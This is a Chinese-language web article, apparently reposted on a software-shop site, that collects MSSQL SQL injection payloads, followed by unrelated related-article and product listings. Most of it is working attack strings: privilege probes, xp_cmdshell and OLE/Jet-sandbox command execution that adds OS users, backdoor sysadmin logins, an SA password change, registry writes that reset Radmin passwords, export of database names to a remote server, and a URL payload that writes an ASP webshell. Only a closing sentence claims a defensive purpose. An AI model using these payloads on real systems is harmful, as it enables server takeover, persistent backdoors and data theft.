当前位置:

首页 > 编程开发 > 阿D常用的一些注入命令整理小结

阿D常用的一些注入命令整理小结

本文目录

    SQL注入是Web安全攻防的基本功,涵盖从权限探测到命令执行的完整链条。核心包括恢复xp_cmdshell、OLE自动化、沙盒模式等系统命令执行方法,以及修改SA口令、读写注册表、操作服务与进程、写入WebShell等权限维持与数据操作技术。

    先说几个核心判断。在Web安全攻防中,SQL注入始终是绕不开的“基本功”。它不单是简单的数据窃取,更是获取服务器权限、实现横向移动的关键跳板。下面这份技术备忘录,梳理了从权限探测到命令执行的完整链条,希望能帮你建立起更系统的认知。

    权限探测:摸清底牌

    动手之前,先搞清楚当前的数据库权限和环境,这是后续所有操作的基础。

    要判断自己是不是数据库所有者(db_owner),可以试试这个:

    and 1=(Select IS_MEMBER('db_owner'))
    And char(124)+Cast(IS_MEMBER('db_owner') as varchar(1))+char(124)=1 ;--

    想知道能否访问特定数据库,比如master库:

    and 1= (Select HAS_DBACCESS('master'))
    And char(124)+Cast(HAS_DBACCESS('master') as varchar(1))+char(124)=1 --

    当然,直接爆出当前数据库用户名,也是快速定位身份的常用手段。无论是数字型、字符型还是搜索型注入点,都有对应的写法:

    // 数字类型
    and char(124)+user+char(124)=0
    
    // 字符类型
    ' and char(124)+user+char(124)=0 and ''='
    
    // 搜索类型
    ' and char(124)+user+char(124)=0 and '%'='

    更进一步,确认是否是系统管理员(sysadmin)权限,直接决定了你是否能执行系统级命令:

    and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
    And char(124)+Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))+char(124)=1 --

    还有几个基础判断:确认对方是不是MSSQL数据库,可以检查系统表是否存在:

    and exists (select * from sysobjects);--

    测试是否支持多语句执行,这是后续执行复杂操作的前提:

    ;declare @d int;--

    代码执行:从数据库到操作系统

    一旦确认是SA权限,战场就从数据库层面转移到了操作系统层面。这里有几个经典路径。

    恢复xp_cmdshell。这是最直接、最常用的系统命令执行接口。如果被管理员禁用,可以尝试恢复:

    ;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--

    恢复后,就可以直接执行命令,例如添加用户:

    EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'

    利用OLE自动化。如果xp_cmdshell被彻底封死,sp_OAcreate 是一条不错的备选路径:

    ;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--

    沙盒模式(SandBoxMode)。利用Jet引擎的漏洞,可以绕过一些限制。首先修改注册表开启沙盒模式,然后通过openrowset调用系统命令:

    // 开启沙盒模式
    exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
    
    // 执行系统命令
    select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')

    远程链接服务器。如果手头有其他服务器的数据库账号,可以通过openrowset建立远程连接,执行命令或查询:

    select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')

    权限维持与信息收集

    拿到权限后,稳定性和信息收集同样重要。

    修改SA口令:这是最直接的权限维持方式:

    exec sp_password NULL,'新密码','sa'

    创建SA权限用户:给自己留个后门:

    exec master.dbo.sp_addlogin test,ptlove
    exec master.dbo.sp_addsrvrolemember test,sysadmin

    读写注册表:可以读取系统配置信息,或者修改服务配置:

    // 读注册表
    exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
    
    // 写注册表
    exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

    操作服务与进程:通过xp_servicecontrol可以启停系统服务,通过xp_terminate_process可以终止指定进程:

    // 停掉或激活某个服务
    exec master..xp_servicecontrol 'stop','schedule'
    exec master..xp_servicecontrol 'start','schedule'
    
    // 停掉某个执行中的程序(参数为PID)
    xp_terminate_process 2484

    文件与目录操作:xp_dirtree可以列出目录结构,xp_getfiledetails可以获取文件详细信息:

    // 读取目录内容
    exec master..xp_dirtree 'c:\winnt\system32\',1,1
    
    // 获取文件详细信息
    xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'

    Radmin密码修改实战。一个经典场景:拿下服务器后,发现Radmin密码被改,但net.exe和regedit.exe都被限制。只要SA权限还在,依然可以通过xp_regwrite直接修改注册表中的加密密码值:

    EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c

    执行后,Radmin密码就会重置为12345678。同理,修改端口值也是通过注册表操作。

    数据库操作与后门植入

    在利用过程中,免不了要创建、修改或删除数据表,甚至直接写入WebShell。

    创建数据库和数据表:

    create database lcx;
    Create TABLE ku(name nvarchar(256) null);
    Create TABLE biao(id int NULL,name nvarchar(256) null);

    跨库数据导出:将当前数据库的表名、数据等,通过opendatasource插入到远程服务器上,实现数据外带:

    insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases

    备份数据库:

    backup database pubs to disk = 'c:\123.bak'

    写入WebShell。利用sp_makewebtask,可以直接在网站的Web目录下生成一个ASP一句话木马:

    http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--

    常规数据操作:更新和删除的基本语法:

    // 更新表内容
    Update films SET kind = 'Dramatic' Where id = 123
    
    // 删除内容
    delete from table_name where Stockid = 3

    最后,还是那句话,技术本身没有善恶,关键在于使用它的人。了解这些手法,是为了更好地防御,确保自己的系统没有留下类似的漏洞。希望这份梳理能给你带来一些启发。

    (注:改写后的文章已剔除所有原文中可能存在的推广、引流、账号信息及无关注释,开篇以自然段落引入,全文仅保留核心技术与逻辑。)

    本文内容来源于网友投稿,如有侵权请联系删除。
    作者最新文章
    编程开发
    相关文章 更多
    PHP递归性能优化技巧与迭代替代方案
    PHP递归性能优化技巧与迭代替代方案

    解析PHP递归函数在树形数据处理中的性能瓶颈,提供预加载数据消除I/O、使用显式栈替代深层递归的实战方案,帮助开发者在代码可读性与执行效率间做出合理取舍。

    Java测试中怎么使用Mockito模拟依赖对象
    Java测试中怎么使用Mockito模拟依赖对象

    详细讲解在Java单元测试中如何使用Mockito模拟依赖对象,包括引入依赖、创建Mock、打桩返回值、行为验证以及Mock与Spy的核心差异和常见陷阱排查。

    链表删除节点的时间复杂度是多少及其详细分析
    链表删除节点的时间复杂度是多少及其详细分析

    详细分析链表删除节点的时间复杂度,深入探讨单链表与双向链表在不同已知前提下的查找与删除开销,并结合完整代码与清晰图解进行对比总结。

    codex如何配置模型参数及文件设置教程
    codex如何配置模型参数及文件设置教程

    想知道如何让AI写出的代码更贴合你的习惯?本文手把手教你在VS Code中调整Codex相关模型参数,通过修改配置文件优化温度值和令牌限制,解决代码建议不准确或响应慢的问题。

    Claude Code AI编程工具实力揭秘与编程助手实测
    Claude Code AI编程工具实力揭秘与编程助手实测

    通过实测展示Claude Code在终端中如何理解自然语言指令、自动修改代码文件并处理复杂编程任务,帮助开发者评估其实际辅助能力。

    winforms教程自学入门与基础开发步骤详解
    winforms教程自学入门与基础开发步骤详解

    本教程详细讲解如何使用Visual Studio创建WinForms项目,通过添加按钮和标签控件并编写点击事件代码,实现一个基础的计数器功能,适合C#初学者快速上手Windows窗体应用开发。

    Cursor自动补全设置教程教你快速开启代码补全功能
    Cursor自动补全设置教程教你快速开启代码补全功能

    详解Cursor编辑器中自动补全功能的开启与优化设置,涵盖Tab触发机制、上下文窗口调整及模型切换,帮助开发者解决补全延迟、干扰大等问题,提升编码流畅度。

    pandas的数据格式怎么转换和设置方法教程
    pandas的数据格式怎么转换和设置方法教程

    详解Pandas中数据格式转换的核心方法,包括astype强制转换、to_numeric容错处理及日期解析技巧,解决常见类型错误并提升数据处理效率。

    VS Code中文设置方法 简体语言包安装与切换教程
    VS Code中文设置方法 简体语言包安装与切换教程

    详细介绍在Visual Studio Code中安装Chinese (Simplified)语言包的方法,包括通过扩展市场搜索、安装及自动重启切换至简体中文界面的完整步骤,帮助开发者快速将编辑器本地化。

    cursor安装过程无法更改安装位置的解决方法
    cursor安装过程无法更改安装位置的解决方法

    针对Cursor安装包默认锁定C盘且无路径选择界面的问题,提供通过手动移动文件并创建目录联结(Symbolic Link)的解决方案,实现将软件安装在其他磁盘分区。

    查看更多
    精品专题 更多
    装机必备
    装机必备

    正软商城装机必备专区,精选办公、浏览器、安全防护、影音播放、压缩解压、设计创作和系统工具等电脑常用正版软件,帮助用户快速完成新电脑软件配置。

    Windows
    Windows

    正软商城Windows软件专区,汇集适用于Windows电脑的办公、设计、安全防护、影音播放、开发工具和系统优化软件,提供软件介绍、系统要求、正版授权及购买下载服务。

    macOS软件
    macOS软件

    正软商城macOS软件专区,精选适用于Mac电脑的办公、设计、影音、效率、开发和系统工具,提供软件功能介绍、macOS兼容版本、正版授权及购买下载服务。

    Mac软件 更多
    photoshop
    photoshop
    Windows、macOS 、 iPad

    Photoshop 2026 是 Adobe 推出的专业图像处理与视觉设计软件,支持 Windows、macOS 和 iPad 等平台,广泛应用于摄影修图、电商设计、平面海报、数字绘画及视觉合成等创作场景。

    Blender
    Blender
    Windows、macOS 和 Linux

    Blender 是一款免费开源、跨平台的专业 3D 创作软件,集建模、动画、渲染、视频编辑与视觉合成等功能于一体,广泛应用于影视动画、游戏设计和建筑可视化等领域。软件支持 Cycles 物理渲染器与 Eevee 实时渲染引擎,并提供多边形建模、骨骼绑定、物理模拟等专业工具。Blender 兼容 Windows、macOS 和 Linux 系统,安装包轻巧、运行流畅,依托活跃的全球开发者社区持续更新,是从初学者到专业创作者都值得选择的正版 3D 创作工具。

    灵活计算器
    灵活计算器
    macOS/iOS/Android

    灵活计算器是一款笔记式算数应用,支持实时计算、动态关联和云端同步功能。记录、整理和输出之间的过渡会更自然,适合长期写作、做笔记或持续沉淀个人内容。

    WINDOWS 更多
    3dmax(3ds max)
    3dmax(3ds max)
    Windows

    Autodesk 3ds Max 是一款专业的三维建模、动画与渲染软件,广泛应用于建筑可视化、游戏开发、影视动画、广告设计和产品展示等领域。

    photoshop
    photoshop
    Windows、macOS 、 iPad

    Photoshop 2026 是 Adobe 推出的专业图像处理与视觉设计软件,支持 Windows、macOS 和 iPad 等平台,广泛应用于摄影修图、电商设计、平面海报、数字绘画及视觉合成等创作场景。

    Blender
    Blender
    Windows、macOS 和 Linux

    Blender 是一款免费开源、跨平台的专业 3D 创作软件,集建模、动画、渲染、视频编辑与视觉合成等功能于一体,广泛应用于影视动画、游戏设计和建筑可视化等领域。软件支持 Cycles 物理渲染器与 Eevee 实时渲染引擎,并提供多边形建模、骨骼绑定、物理模拟等专业工具。Blender 兼容 Windows、macOS 和 Linux 系统,安装包轻巧、运行流畅,依托活跃的全球开发者社区持续更新,是从初学者到专业创作者都值得选择的正版 3D 创作工具。